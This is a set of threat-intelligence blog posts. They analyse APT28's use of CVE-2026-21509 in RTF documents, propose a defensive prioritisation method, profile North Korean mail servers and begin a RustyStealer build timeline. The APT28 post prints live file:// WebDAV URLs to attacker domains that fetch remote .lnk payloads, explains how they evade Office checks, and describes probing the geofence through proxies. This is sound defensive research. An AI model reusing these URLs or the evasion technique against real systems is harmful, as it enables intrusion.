APT28: Geofencing as a Targeting Signal (CVE-2026-21509 Campaign)

by Robin Dost


Since the beginning of this year, we have again observed an increased number of attacks by APT28 targeting various European countries. In multiple campaigns, the group actively leverages the Microsoft Office vulnerability CVE-2026-21509 as an initial access vector.

This article focuses on how CVE-2026-21509 is used in practice, how relevant IOCs can be extracted efficiently from weaponized Word documents and how the actors own geofencing can be leveraged to infer operational target regions.

Before diving into the analysis, a brief look at CVE-2026-21509 itself.

Understanding CVE-2026-21509 (Click)

CVE-2026-21509 is a Microsoft Office vulnerability affecting how embedded OLE objects are validated during document processing.
Microsoft classifies it as a security feature bypass, which is accurate, but undersells the actual problem.
Office makes trust decisions based on internal object metadata that originates directly from the document itself.
The vulnerability does not rely on macros, scripts or external templates, it is triggered during normal parsing of specially crafted RTF documents.
From a user perspective, the document appears inert. There are no prompts, no warnings and nothing that would suggest active content.
The exploit uses RTF control words such as \object and \objdata to embed raw binary data inside the document.
During parsing, Word reconstructs this data into in-memory OLE structures, effectively rebuilding Composite File Binary objects on the fly. This reconstruction step is where the vulnerability is exposed.
The reconstructed OLE objects are deliberately malformed. Their headers look plausible, but their internal structure is inconsistent. Strict parsers reject them. Word does not. It continues processing and enters code paths that assume a coherent internal state.
Observed samples frequently use OLE Package objects and legacy COM class identifiers associated with historically risky components.
By manipulating how these objects are represented internally, Office checks meant to block them are bypassed, not by disabling protections, but by misleading the logic that decides whether those protections apply.
The document itself contains no payload. Its sole purpose is to reach a state where Office processes an object it should not trust.
Any follow-on activity happens later and outside the document.
This separation between exploit and payload fits well with current intrusion chains.

From a defensive POV, this explains why CVE-2026-21509 is easy to miss.
Static analysis shows no macros, no external relationships and no obvious indicators.
The malicious structures only exist after Word reconstructs them, which places the exploit below the visibility of most document scanning and macro-focused controls.

tldr;

CVE-2026-21509 is a Microsoft Office vulnerability that allows attackers to bypass internal security checks when Word processes embedded OLE objects.
The issue is triggered during normal document parsing and does not rely on macros, scripts or external content.
A specially crafted RTF document embeds malformed OLE objects that Word reconstructs in memory.
Office then makes security decisions based on this reconstructed data, even though it originates from the untrusted document.
By manipulating that data, an attacker can cause Word to accept and process objects that should normally be blocked.

The document itself contains no payload and appears harmless under static analysis. Exploitation happens entirely inside Words parsing and object handling logic, below the level where most document scanners operate.

Analyzed Samples

For this analysis, I looked at the following samples:

HashDownload
c91183175ce77360006f964841eb4048cf37cb82103f2573e262927be4c7607fDownload
5a17cfaea0cc3a82242fdd11b53140c0b56256d769b07c33757d61e0a0a6ec02Download
b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546Download
fd3f13db41cd5b442fa26ba8bc0e9703ed243b3516374e3ef89be71cbf07436bDownload
969d2776df0674a1cca0f74c2fccbc43802b4f2b62ecccecc26ed538e9565eaeDownload

When I receive potentially malicious Word documents, my first step is usually to run oleid. In most common malicious documents, this already reveals macros, external references or other active content.

In this case, oleid reports a clean file. No macros, no external relationships, no obvious indicators.

This is expected.

The document is not a classic OLE container but an RTF file. In RTF, embedded objects are stored as hexadecimal data inside the document body using control words such as \object and \objdata. These objects do not exist as real OLE structures until Word parses the document and reconstructs them in memory.

oleid operates at the container level. It can only detect features that already exist as structured objects in the file. Since the embedded OLE data is still plain text at this stage, there is nothing for oleid to flag.

The exploit surface of CVE-2026-21509 only becomes visible after this reconstruction step. Tools like rtfobj replicate this part of WordS parsing logic by extracting and rebuilding the embedded objects from the RTF stream.

rtfobj -s all b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546.doc

Once reconstructed, the embedded objects are clearly malformed. They resemble OLE containers but fail validation by strict parsers, which is exactly the condition the vulnerability relies on.


After extracting the embedded objects, I inspected the resulting files using xxd. At this stage, strings did not yield anything particularly useful, which is not surprising given that the document is not designed to carry a readable payload.

From this data, the following strings could be extracted:


file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.LnK?init=1
file://wellnessmedcare.org/buch/pol/Downloads/document.LnK?init=1
file://wellnessmedcare.org@ssl/cz/Downloads/document.LnK?init=1
file://freefoodaid.com@80/documents/2_2.lNk?init=1


Why file://…/davwwwroot/...lnk is used

Paths like
file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.lnk?init=1
are chosen to force specific Windows and Office code paths.

Using file:// changes how Office interprets the access. The resource is treated as a file system object, not as web content. This affects which security checks are applied and how trust is evaluated.
Mark-of-the-Web handling and web-centric protections do not apply in the same way as they would for http or https.
The davwwwroot path forces WebDAV.
This causes Windows to access the resource via the WebClient service, exposing the remote content as a network-like file system.
WebDAV remains a special case in Windows, where remote files are often handled similarly to local or SMB resources.
The .lnk file is the actual target.
The Word document contains no payload and performs no execution itself.
Its sole purpose is to reach a state where access to the remote resource is allowed.
Shortcut files are attractive because they can execute commands or load further components while being subject to different checks than executables or scripts, especially when accessed through WebDAV.
The query parameter is client-side only.
It is used to avoid caching and to reliably trigger initial access behavior. It has no functional relevance for the server.
In the context of CVE-2026-21509, this fits cleanly.
The vulnerability causes Office to make incorrect trust decisions during document parsing.
Once that decision is made, accessing a remote shortcut via a file:// WebDAV path becomes possible without macros, scripts or explicit downloads.

Identifying Targets

While analyzing the documents and extracted URLs, it became apparent that they reference potential target regions:

  • /cz/ -> Czech Republic
  • /buch/ -> Bucharest / Romania
  • /pol/ -> Poland

Additional indicators inside the Word documents further support this assessment:

  • Romanian language content
  • References to Ukraine
  • Mentions of Slovenia
  • EU-related context

None of this is accidental.

At this point, the next step is validation. Russian threat actors are known to rely heavily on geofencing and APT28 is no exception. Fortunately, this behavior can be turned into a useful source of intelligence for us ^-^

Turning Geofencing into Intelligence

The first step was to take a closer look at the domains extracted from the samples:

wellnessmedcare.org193.187.148.169
freefoodaid.com159.253.120.2

What stands out here is the choice of hosting locations.
Both IP addresses resolve to providers in Romania and Moldova. It is reasonable to assume that these locations were selected based on the campaigns intended target regions.

Next, I attempted to replicate the WebDAV requests generated by Windows in order to test the observed geofencing behavior.
To do this, I executed the document in a sandbox and captured the resulting network traffic.

Geofence Analysis

To validate the geofencing, I needed to determine which proxy locations were required to access the malicious resources without being blocked.
After identifying suitable proxies, I performed test requests using a custom script, once without a proxy and once using a Romanian proxy.

Without proxy:

With proxy:

The result is fairly clear. Requests originating from outside the expected regions are rejected with HTTP 403, while requests routed through a Romanian proxy succeed. This pattern can be used to validate likely operational target regions.

Out of 114 tested countries, only three were allowed access: Czech Republic, Poland and Romania. This aligns perfectly with the indicators observed earlier in the documents and URLs.

As this example shows, defensive measures such as geofencing can provide valuable intelligence when analyzed properly. Even access control mechanisms can leak information about an actors operational focus if you know where to look.
The second domain, freefoodaid.com, was already offline at the time of analysis. Given how short-lived APT28 infrastructure tends to be, this is hardly surprising. It is reasonable to assume that similar geofencing behavior would have been observable there as well, but for demonstration purposes, the remaining data is more than sufficient.

How to protect against these attacks

Update Microsoft Office and enforce a structured update routine.
Treat unexpected Word documents as untrusted and have them analyzed before opening them.
(or stop using windows :3)

Conclusion

CVE-2026-21509 works because it fits neatly into how Office processes documents today.
The exploit relies on internal object reconstruction, not on macros or embedded payloads, which makes it easy to overlook during initial analysis.
The surrounding tradecraft follows a familiar pattern.
WebDAV paths, remote shortcut files and strict geofencing have been used by APT28 before and continue to show up in current campaigns.
The technique is stable, requires little user interaction and avoids most of the controls that organizations typically rely on.
At the same time, this setup exposes useful signals.
Geofencing decisions, hosting locations and access behavior provide insight into intended target regions when tested systematically.
In this case, the infrastructure behavior aligns closely with the indicators found inside the documents.

From an analytical perspective, the value lies less in the exploit itself and more in what can be inferred from how it is deployed and constrained.

Actor-Centric Defensive Prioritization (ACDP)

by Robin Dost

Introduction

Much of my previous work has focused on understanding threat actors not through individual malware samples alone, but through infrastructure, operational behavior, and strategic intent. Over time, a recurring problem became increasingly difficult to ignore:

While our visibility into attacker tradecraft continues to improve, our ability to decide what to defend first often does not.

Most security frameworks excel at describing what exists, techniques, controls, and best practices, but remain largely silent on what should matter most when resources are limited or when a specific threat actor becomes relevant.
Instead of introducing another generic framework, this article applies an actor-centric prioritization methodology focused on attacker intent and impact.
This approach emerged from a practical need I repeatedly encountered: organizations often had technically sound controls in place, yet still failed to prevent strategic loss, because their defensive investments were misaligned with the attackers actual objectives.

Why ACDP Was Developed

Actor-Centric Defensive Prioritization (ACDP) was developed to address a persistent gap between threat intelligence and defensive decision-making.

Threat intelligence typically answers questions such as:

  • Who is active?
  • What techniques are being used?

Defensive planning, however, must answer differnt questions:

  • What failure would be unacceptable?
  • Which controls meaningfully disrupt this actors strategy?

In real world environments, especially those facing state-aligned or destructive actors, it is rarely feasible to implement every recommended control simultaneously.
Prioritization becomes inevitable.

ACDP exists to make that prioritization explicit, defensible, and actor-aware.

What Makes This Approach Different

ACDP does not attempt to replace established frameworks such as MITRE ATT&CK or NIST.
Instead, it operates one level above them, using their outputs as inputs.

Its defining characteristic is a deliberate shift in perspective:

  • from technique coverage to strategic disruption
  • from static maturity models to adaptive decision-making
  • from generic best practices to context-driven trade-offs

The result is a reasoned ordering of defensive actions, based on how much they interfere with an adversary intent and how much damage they prevent if that interference fails.

Advantages of an Actor-Centric Approach

The strengths of ACDP are primarily practical:

  • ACDP enables rapid reprioritization when threat actor relevance changes
  • It aligns defensive investment with attacker objectives instead of abstract risk scores
  • It acknowledges budget and operational constraints instead of assuming ideal conditions
  • It helps explain why certain controls take priority, a critical factor in both technical and executive discussions

Most importantly: ACDP encourages organizations to think in terms of losing conditions, not only detection coverage

Limitations and Trade-Offs

ACDP is not without drawbacks.

Because it is actor-centric, its effectiveness depends on the quality of the underlying threat intelligence.
Incorrect assumptions about attacker intent can lead to misplaced priorities.
Additionally, ACDP does not provide prescriptive control definitions or implementation guidance. It assumes foundational security hygiene already exists and focuses solely on ordering, not designing, defensive measures.
Finally, ACDP deliberately avoids the comfort of exhaustive coverage. It forces uncomfortable decisions, choosing what not to prioritize, which may challenge existing security narratives.

A Practical Motivation

The motivation behind ACDP is operational necessity

In environments where time, budget, and certainty are constrained, security decisions must be made before all information is available. ACDP provides a structured way to make those decisions without pretending that all risks are equal.

If defensive priorities do not change when attacker intent changes, prioritization is no longer strategic

ACDP in Practice: Quantified Prioritization Example

This section demonstrates how ACDP produces concrete priorities, using a scoring example against Sandworm.

Step 0: Define the Objective Profile

Based on historical and current operations, Sandworm is modeled as a:

Destructive, state-aligned actor prioritizing strategic impact over access longevity

This assumption directly influences weighting.

Step 1: Define the Scoring Axes

Each defensive control is evaluated across four axes.

Axis A: Actor Disruption Value (ADV)

How strongly does this control interfere with the actors campaign strategy?

ScoreMeaning
5Breaks or invalidates the strategy
4Forces significant tradecraft change
3Causes friction
2Minor inconvenience
1Negligible effect

Axis B: Impact Risk Reduction (IRR)

How much real damage does this control prevent if the actor succeeds elsewhere?

ScoreMeaning
5Prevents catastrophic / irreversible impact
4Strongly limits blast radius
3Partial damage reduction
2Minimal reduction
1Cosmetic

Axis C: Cost & Operational Complexity (CC)

How realistic is implementation under time and budget pressure?

ScoreMeaning
5Low cost, low friction
4Moderate effort
3Manageable complexity
2High effort
1Very expensive / disruptive

Axis D: Detection-to-Decision Time (DDT)

Does this control provide usable signal early enough to change outcomes?

ScoreMeaning
5Immediate / pre-impact
4Early warning
3Delayed but actionable
2Mostly reactive
1Post-incident only

Step 2: Actor-Specific Weighting

For a destructive actor, impact prevention and strategic disruption dominate:

  • ADV = 35%
  • IRR = 35%
  • CC = 15%
  • DDT = 15%

Step 3: Scoring Selected Controls

Candidate Controls

  • Immutable offline backups
  • VPN / edge device inventory & patch SLAs
  • Historical DNS & infrastructure analysis
  • PowerShell command-line logging
  • Scheduled task auditing
  • Security awareness training

Scoring Table

ControlADVIRRCCDDT
Immutable offline backups5535
Edge inventory & patching4444
Historical DNS analysis4344
PowerShell logging3243
Scheduled task auditing3233
Awareness training1151

Step 4: Priority Index Calculation

Formula

PI = (ADV × 0.35) + (IRR × 0.35) + (CC × 0.15) + (DDT × 0.15)

Example Calculations

Immutable offline backups

(5×0.35) + (5×0.35) + (3×0.15) + (5×0.15) = 4.70

PowerShell logging

(3×0.35) + (2×0.35) + (4×0.15) + (3×0.15) = 2.80

Step 5: Final Prioritization

ControlPIPriority Tier
Immutable offline backups4.70Tier 1
Edge inventory & patching4.00Tier 1
Historical DNS analysis3.75Tier 2
PowerShell logging2.80Tier 2
Scheduled task auditing2.75Tier 3
Awareness training1.90Tier 4

Step 6: Interpretation

The results highlight several non-obvious truths:

  • Recovery capability outranks detection
  • Infrastructure hygiene outranks user behavior
  • Controls that look impressive may rank low
  • Controls that feel boring often dominate

This is basically the mathematical expression of attacker intent.

Why the Calculation Matters

Without explicit scoring:

  • prioritization becomes opinion
  • decisions become political
  • trade offs remain implicit

ACDP forces those trade-offs into the open.

If you cannot explain your priorities numerically, you are not prioritizing: you are rationalizing

Closing Thoughts

Often times security failures are caused not by missing controls, but by misaligned priorities.
ACDP was developed to address this misalignment by shifting the focus from technique coverage to attacker intent, and from abstract risk to tangible impact. Its value lies in deliberate selection.
Used correctly, ACDP does not replace existing frameworks, but sharpens them by forcing uncomfortable but necessary decisions.
This methodology is intentionally opinionated!


If you have any feedback or questions, please feel free to contact me by email.
I welcome criticism and feedback!

Why Is a North Korean Mail Server Using a .cc Domain? – Threat Intelligence Beyond Malware


by Robin Dost

Today I stumbled over a rather accidental finding during a routine analysis of North Korean infrastructure that I would like to share with you.
Since North Korea does not exactly use the internet for legitimate purposes and is well known for a long history of attacks against (critical) infrastructure, I consider it reasonable to treat essentially all North Korean internet-facing infrastructure as a threat entity by default. Infrastructure changes often reveal far more about a threat actor than individual malware samples ever will and the same applies to nation states like North Korea. That is precisely why this infrastructure deserves continuous observation.

For clarity: no offensive actions were performed during this analysis. Everything shown here is based exclusively on publicly accessible data and very basic reconnaissance.
Even if the target happens to be North Korean infrastructure, operating within legal boundaries remains mandatory. Germany unfortunately does not always make this easy, but whatever.

Enough about that. Let’s get into the analysis.

Initial Discovery

Due to a historic DNS leak, we currently have a surprisingly large collection of publicly reachable websites hosted inside North Korea. I scanned these sites for email addresses because I was curious about the current state of their mail infrastructure. I had looked into this years ago but lost track of it over time. Back then, heavy geofencing was common and many services were blocked outright, so the obvious question was whether this still applies today (it does not)

For this quick assessment, I focused on two sites:

Both pages expose email addresses:

The addresses
ryongnamsan@star-co.net.kp and
mab@silibank.net.kp
point to the domains star-co.net.kp and silibank.net.kp.

If these addresses are actively used, we should also find corresponding mail servers.

Indeed, this yields four SMTP hosts worth inspecting:

  • smtp.star-co.net.kp
  • smtp1.star-co.net.kp
  • mail.star-co.net.kp
  • mail.silibank.net.kp

I verified reachability on the typical mail ports (25, 465, 587).

smtp.star-co.net.kp
smtp1.star-co.net.kp
mail.star-co.net.kp (offline)
mail.silibank.net.kp

I verified reachability on the typical mail ports (25, 465, 587)

MailserverIP-AddressOpen Mail PortsRunning
smtp.star-co.net.kp175.45.178.5625,587Postfix
smtp1.star-co.net.kp175.45.178.5725,587Postfix
mail.star-co.net.kp175.45.178.55Postfix
mail.silibank.net.kp175.45.177.3325Postfix


So far, nothing spectacular, until we look at the TLS certificate.

The Certificate That Shouldn’t Exist (At Least Not Like This

You can download the original certificate here:

Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 4096 (0x1000)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=KP, ST=Pyongyang, L=Junggu, O=DevelopTeam, CN=StarJV Certificate Authority, emailAddress=postmaster@star-co.net.kp
        Validity
            Not Before: Nov 23 08:48:45 2024 GMT
            Not After : Nov 23 08:48:45 2027 GMT
        Subject: C=KP, ST=Pyongyang, L=Junggu, O=StarJVC, OU=DevelopTeam, CN=mail.nisp.cc, emailAddress=postmaster@star-co.net.kp
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:ad:82:f5:13:18:cd:33:41:c6:c4:36:b2:55:33:
                    5a:e3:e3:d7:3a:a5:34:78:2f:96:60:41:83:e5:7f:
                    13:cd:fc:97:a2:dd:86:92:3d:f6:ce:bd:fd:ac:73:
                    ad:79:5c:52:8d:c4:2f:be:39:c9:a8:17:b8:a0:f2:
                    85:42:03:5a:26:95:dc:ce:15:ec:80:fa:16:56:2e:
                    bc:cf:89:f6:5a:ad:d9:60:18:17:3b:a3:63:62:3f:
                    8b:96:33:ad:86:f5:af:3b:73:d2:17:eb:20:9d:84:
                    89:03:2a:97:e5:a6:c2:2a:75:ef:1d:04:2b:16:92:
                    ff:50:95:87:a3:d1:df:5f:e0:0e:5b:1a:86:5d:e7:
                    23:90:7a:b2:33:6d:d1:7e:49:2b:c0:bf:25:95:b7:
                    37:e0:83:0a:85:96:04:35:1b:e6:35:fd:b9:c1:08:
                    39:f8:92:7f:1b:c9:f6:84:d5:07:7d:64:65:a5:58:
                    76:09:f4:e0:4e:6c:bc:19:bb:a8:09:5c:90:db:5d:
                    1c:43:79:35:b1:8f:15:d2:df:b4:b0:89:d4:32:e3:
                    37:4f:ad:51:5c:49:94:6f:99:22:19:d0:c2:37:cf:
                    1c:76:8c:d0:45:7d:5c:79:74:f3:2a:49:d3:5c:f6:
                    d9:4f:d8:f5:fd:d7:4c:b5:0c:d6:17:72:22:44:0a:
                    30:65
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        4e:d0:bd:4a:89:48:95:2a:58:51:2e:7e:52:53:87:8c:ed:a9:
        ed:1a:ea:b8:0a:53:75:bb:d1:3b:7f:25:76:b6:f9:bb:38:fe:
        d9:07:96:ff:2e:af:58:8e:8c:7e:a5:3d:8a:a1:bc:82:ab:8f:
        39:b9:bf:37:03:1e:6e:40:8f:59:ac:29:e3:46:4a:2e:fb:b3:
        59:29:fa:b3:e3:ba:e8:6e:3d:31:a7:ab:41:66:9b:42:8a:98:
        65:94:53:bc:24:5c:3d:83:dc:cb:15:64:02:80:7c:2a:31:c1:
        f3:18:70:d9:82:54:14:bf:b2:33:d4:d8:61:53:56:d8:06:f6:
        e7:b8:15:03:b4:0c:a3:13:f6:fd:0d:08:a0:50:b8:b8:a4:a7:
        1f:d1:a2:56:ba:6e:b8:c4:cf:18:c6:f0:11:f5:18:6b:df:d5:
        91:e0:41:30:35:96:4c:34:1b:25:c1:01:69:f7:b2:d2:36:c9:
        2d:10:a7:81:c2:bb:b4:b0:38:99:9b:81:7d:bd:30:9f:e6:d7:
        f0:c1:0b:cb:b6:ef:fe:34:94:7a:cd:40:f7:56:87:87:fb:50:
        39:d9:4a:1b:78:f9:81:ff:a0:54:b4:8f:90:21:c0:0c:50:73:
        1b:78:59:31:06:fb:d9:d9:0d:43:f3:b9:b8:63:2e:a7:cc:86:
        bf:cb:22:67:a8:7d:af:ee:68:41:ab:f3:53:7f:b0:fd:d5:bf:
        6c:18:9e:db:b4:ab:23:39:78:93:69:7f:95:a3:9f:dd:3a:14:
        f1:16:32:b6:83:58:e2:34:d2:e2:49:04:aa:21:62:20:e3:2a:
        28:b0:9d:8d:6a:6f:0d:f6:9f:5c:c6:11:51:56:93:35:82:19:
        bd:af:81:bc:ff:6e:30:57:37:fc:cb:fa:20:01:de:c4:66:2c:
        f7:44:d5:9e:b8:9c:d9:f4:8e:99:68:4d:47:b6:d4:5b:05:8d:
        9f:d6:6f:8c:6e:8d:8a:d8:ab:4b:63:8d:e3:5b:65:81:e5:3a:
        79:82:f2:00:c4:54:57:e1:00:f2:1b:22:59:41:71:df:49:89:
        76:c7:01:54:70:35:4b:25:fa:1e:95:a5:4e:82:e2:ef:c8:e3:
        b2:c0:5c:7b:bb:28:6f:0c:db:48:5f:4b:70:96:5c:df:f4:7c:
        e7:42:f1:82:f6:99:6e:db:de:c7:e7:ff:01:f8:1a:84:62:2e:
        1d:e2:11:b1:ba:f0:b0:c2:a7:2f:36:27:4d:fb:ed:c9:4b:42:
        c3:bd:cf:b3:65:99:67:68:38:1d:eb:fe:2a:c7:b9:62:80:a3:
        f5:f2:b2:c1:0f:53:7c:06:ed:61:7e:b8:e6:fc:89:36:ea:c0:
        5b:2f:6d:6d:88:48:30:9a

Several anomalies immediately stand out:

External Identity Domain (mail.nisp.cc)
  • Observations
  • TLS CN = mail.nisp.cc
  • Domain is outside of .kp
  • No MX records exist
  • The domain appears to be used purely for identity, not routing

According to WHOIS (if we trust it), the domain was registered in 2025 via juming.com, a registrar I would generously describe as “economically efficient” rather than reputable.

Beyond that, there is essentially no public footprint for this domain.

Inference

There appears to be a deliberate separation between:

  • Routing identity: .kp domains
  • Cryptographic identity: .cc domain

Imo, this is a deliberate architectural decision and not an accident

Private State PKI (StarJV Certificate Authority)

Observations

  • Custom internal CA visible in the certificate
  • Not publicly trusted
  • Self-managed
  • Extremely primitive X.509 v1 structure

Inference

  • Active internal PKI operation
  • Low compliance and security maturity
  • No external trust anchor available or desired
X.509 Version 1 Certificate

Observations

  • Certificate is Version 1 (no extensions, no SAN, no policy constraints)

Inference

  • Outdated or minimal PKI toolchain
  • No modern security modeling
  • Functionality prioritized over governance
Primitive Serial Number (0x1000)

Observations

  • Serial number equals exactly 4096

Inference

  • Manual or simplistic CA automation
  • No randomness
  • Likely very small PKI scale
Multi-Identity on a Single Host

Observations

  • PTR: ryongnamsan.edu.kp
  • SMTP banner: star-co.net.kp
  • TLS CN: mail.nisp.cc

Inference

  • Central gateway role
  • Multi-tenant usage
  • Organizational consolidation
No MX Records for nisp.cc

Observations

  • Domain exists, but has no mail routing

Inference

  • Domain serves exclusively as an identity anchor
  • No end-user mail usage
  • Reduced abuse exposure
Extremely Large Mail Size (~10 GB)

Observations

SMTP SIZE = 10,000,000,000 bytes

Honestly, I laughed out loud when I saw this.

This configuration seems consistently on both active Star-CO SMTP servers (smtp and smtp1.star-co.net.kp), which looks like this is intentional rather than a misconfiguration. In contrast, the Silibank mail server uses a much more reasonable limit of ~100 MB.
It is therefore reasonable to assume that these mail servers are being used to transfer very large files. In theory, this could even serve as a transport channel for bulk data movement, including data returning from North Korean remote workers abroad. This remains speculative, but the transport capacity itself is undeniable.

If you want to make yourself vulnerable to a denial-of-service attack, you should implement this feature yourself!

Inference

  • Expectation of large payload transfers
  • SMTP likely used as a general-purpose transport channel
  • No restrictive transport policies
Legacy Features Enabled (VRFY, ETRN)

Observations

  • User verification enabled
  • Legacy store-and-forward mechanisms active

Inference

  • Weak hardening discipline
  • Legacy configuration not cleaned up
  • Reliance on network isolation as primary security model
Unknown SMTP Extension (BBBBBBBB)

Observations

  • Non-standard SMTP extension

Inference

  • Bug, custom patch, or QA deficiency
  • Poor implementation hygiene
Recent Activity (Domain 2025 / Certificate 2024)

Observations

  • Domain registered recently
  • Certificate relatively fresh

Inference

  • Active modernization or reorganization
  • Not a purely legacy environment

Temporal Correlation & Strategic Context

We do not perform this kind of analysis purely for entertainment value. The objective is to generate intelligence that may become operationally relevant over time. That means we also need to ask why these infrastructure changes occurred when they did.

Based on available timestamps:

  • Certificate issuance: 23 Nov 2024
  • Domain registration: 21 Aug 2025
November 2024: Certificate Issuance

This period coincides with a phase of increased North Korean geopolitical activity:

  • Formalization of a comprehensive strategic partnership with Russia
  • Ongoing missile testing and military signaling
  • Escalating rhetoric toward South Korea, the US, and Japan
  • Partial reopening of diplomatic channels post-pandemic

Interpretation

The certificate appears to have been issued ahead of this intensified phase. A plausible explanation is preparatory technical groundwork, stabilizing externally reachable infrastructure before increased international activity or visibility

August 2025: Domain Registration

In this period we saw:

  • Continued military demonstrations
  • Publicized return of North Korean personnel from Russia
  • Increased diplomatic engagement with Russia and China
  • Rising international visibility

There is no single triggering political event on this exact date. However, the broader trend shows increased outward-facing engagement.

Interpretation

Registering an externally usable domain such as nisp.cc may reflect a desire to make services more reliably reachable and interoperable internationally during a phase of expanding external activity.

Possible Infrastructure Bridging Function

Even without explicit political announcements, infrastructure often moves first.

It is entirely plausible that North Korea:

  • began improving external visibility of selected services
  • equipped gateways with internationally compatible identities
  • prepared controlled external access paths for future operational needs

Such changes rarely happen accidentally in centralized environments.

Final Thoughts: Why This Matters

Threat intelligence too often focuses narrowly on malware families, campaigns, and short-lived indicators of compromise. When dealing with nation states, this Much of todays threat intelligence still revolves around malware samples, campaign names, and short-lived indicators. That perspective is fundamentally insufficient when dealing with nation states.
States themselves act as long-term threat actors. Their infrastructure evolves far more slowly than malware and when it does change, it usually means someone made a deliberate decision, signed off on a budget, and probably sat through far too many internal meetings.

Infrastructure artifacts quietly expose things most actors would rather not advertise:

  • organizational maturity (or the lack thereof)
  • centralization models
  • operational priorities
  • capacity planning assumptions
  • risk tolerance
  • and governance culture

A single TLS certificate, a misaligned identity domain, or an absurdly permissive transport policy can easily reveal more about an actors operational reality than dozens of shiny malware samples ever could. Sometimes the most valuable intelligence comes from reading what a system accidentally tells you about itself.
This small case demonstrates how even boring protocol metadata can function as durable intelligence signals when correlated properly. Observing infrastructure drift across threat actors or states allows us to detect strategic movement long before it becomes visible in campaigns, headlines, or incident reports.
And as a small bonus observation: while geopolitical ambition clearly scales, PKI maturity and configuration hygiene appear to lag slightly behind. Infrastructure may evolve governance apparently takes its time ^-^

RustyStealer: Your Compiler Is Snitching on You


by Robin Dost

As already mentioned in my last MuddyWater article, I originally planned to take a closer look at the remaining RustyWater samples in the hope of finding additional leftover artefacts. But: writing a pure “let’s grep a few more binaries for leftovers” follow-up article sounded painfully boring, both to read and to write. So instead of doing that, I decided to version the individual samples properly and build a small change-tracking timeline around them.

Mostly out of curiosity, partly out of stubbornness.
At least this way we get something that resembles actual analysis rather than archaeological string hunting.

Before diving into version diffs and timelines, it’s worth briefly grounding what we’re actually dealing with here, without turning this into a full-blown reverse engineering novella.

RustyStealer (sometimes referenced as RustyWater, Archer RAT or related variants in public reporting) is a Rust-based information stealer / RAT that has been observed in MuddyWater-attributed campaigns. In practice it behaves like a fairly typical post-compromise implant: basic host reconnaissance, security product awareness, persistence via registry, C2 communication and modular task execution. Nothing magical, nothing revolutionary, just a modernized tooling stack implemented in Rust instead of the usual C/C++ ecosystem. Here’s an article from cloudseek.com if you are interested in the details of it’s deliver and execution nature.


And that’s exactly where this article deliberately does not go: this is not a line-by-line teardown of every decoding routine, syscall wrapper or math loop. There are already reports on the internet that lovingly explain how a single function increments a counter.

What I’m interested in instead is how this thing evolves over time and how to track it

How do the binaries change between builds?
Which libs appear or disappear?
When does the architecture shift?
Where do experiments get rolled back?
Which parts get hardened, obfuscated or simplified?

The goal is to treat this malware family more like a software project with a messy commit history than a static artifact. By correlating compile timestamps, dependency fingerprints, fuzzy hashes, embedded artefacts and targeted code diffs, we can reconstruct a surprisingly coherent development timeline and extract signals about tooling maturity, experimentation phases and operational priorities .

And honestly: that’s way more fun than grepping strings all day and more useful for my threat actor research

For the analysis I used the following samples:

HashDate
e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd08.01.2026
ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b806822091408.01.2026
7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f5808.01.2026
e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e8310808.01.2026
a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c7910.01.2026

My First Step: I always start with the most low-effort signal: raw strings.
Sometimes you get lucky and developers leave behind absolute paths, usernames, toolchain artefacts or other accidental breadcrumbs.

The first thing I wanted to verify was whether any additional user paths were embedded in the samples:

for x in *.exe; do strings "$x" | r="$(strings "$x" | grep 'C:')"; if ! [ -z "$r" ]; then echo "$x $r\n"; fi ; done 

And yes, in two of the binaries we do indeed find another leftover artefact:

C:\Users\Bruno\Desktop\art.exe
C:\Users\Jacob\...

Just to be clear: the developer is almost certainly not named Bruno/Jacob.
This is simply the username of the build environment used at that time. Still, it gives us a nice anchor point when correlating samples later on.

Dependency extraction and library fingerprinting:

Next, I wanted to extract the dependency information from the binaries:

# get llvm strings
for x in *.exe; do strings "$x" | r="$(strings "$x" | grep 'llvm')"; if ! [ -z "$r" ]; then echo "$x $r\n"; fi ; done
# get crates with version and write to file sample.exe.strings
for x in *.exe; do strings "$x" | grep "crates\.io-" | cut -d'\' -f5 | sort | uniq >> "$x.strings" ;  done

This gives us a list of Rust crates and libraries that were present at build time:

From this output I consolidated a full list of all dependencies observed across all samples.
It already allows a first sanity check: are all samples built from the same dependency set or do we see deviations?

In total, the consolidated list contains 50 libraries, however, each individual sample only exposes around 44-45 crates.
That already tells us that not all builds are identical.

Here is the full list of observed libraries:

LibraryVersion
aead0.5.2
aes0.8.4
aes-gcm0.10.3
atomic-waker1.1.2
base640.22.1
bytes1.10.1
cipher0.4.4
ctr0.9.2
futures-channel0.3.31
futures-core0.3.31
futures-util0.3.31
generic-array0.14.7
h20.4.12
hashbrown0.15.5
http1.3.1
httpparse1.10.1
http-body-util1.7.0
hyper1.7.0
hyper-tls0.6.0
hyper-utils0.1.16
icu_collections2.0.0
icu_normalizer2.0.0
idna1.1.10
indexmap2.11.0
ipnet2.11.0
iri-string0.7.8
mio1.0.4
native-tls0.2.14
percent-encoding2.3.2
rand0.6.5
rand_core0.4.2
rand_hc0.1.0
rand_jitter0.1.4
reqwest0.12.23
schannel0.1.27
slab0.4.11
smallvec1.15.1
socket20.6.0
tokio1.47.1
tokio-native-tls0.3.1
tokio-util0.7.16
tower0.5.2
universal-hash0.5.1
url2.5.7
utf8_iter1.0.4
want0.3.1
windows-registry0.5.3
winreg0.55.0
rustc-demangle0.1.24
rustc-demangle0.1.26

Since we now know that differences exist, I built a per-sample matrix to visualize which libraries appear in which binary:

This makes deviations immediately visible without having to manually diff text dumps.

Compile timestamps

Before grouping anything, I also checked when the individual binaries were compiled.

This can be extracted using:

for x in *.exe; do printf "$x"; objdump -x "$x" | grep "Time/Date"; don

Result:

